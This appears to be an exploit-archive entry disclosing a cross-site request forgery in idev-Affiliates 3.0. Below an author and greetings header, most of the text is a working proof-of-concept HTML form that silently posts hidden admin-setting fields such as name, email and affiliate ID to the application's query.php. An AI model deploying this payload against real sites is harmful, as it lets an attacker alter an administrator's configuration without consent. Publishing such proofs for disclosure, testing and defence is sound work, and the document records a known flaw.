idev-Affiliates version 3.0 suffers from a cross site request forgery vulnerability.
b1f3366eb5a37a9c0da50a0b2f0956a8985079c6eca054abfa63155f5d5cd307
# Exploit Title: idev-Affiliates 3.0 CSRF
# Author: Jonturk75
# Vendor or Software Link: http://idevspot.com
# Category:: webapps
# Demo : http://idevspot.com/demos/idev-affiliates/admin/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com
<form action="../library/query.php" method="post" name="form1" id="form1">
<input name="YOURNAME" class="textarea100" value="idev-Affiliates" type="hidden">
<input name="EMAIL" class="textarea100" value="noreply@idevspot.com" type="hidden">
<input name="SITENAMES" class="textarea100" value="idev-Affiliates" type="hidden">
<input name="AFFID" class="textarea100" value="" type="hidden">
<select name="HELPBOX" size="1"><option></option><option selected>Show</option><option>Hide</option>
<input name="Submit" value="Submit" type="submit">
</form>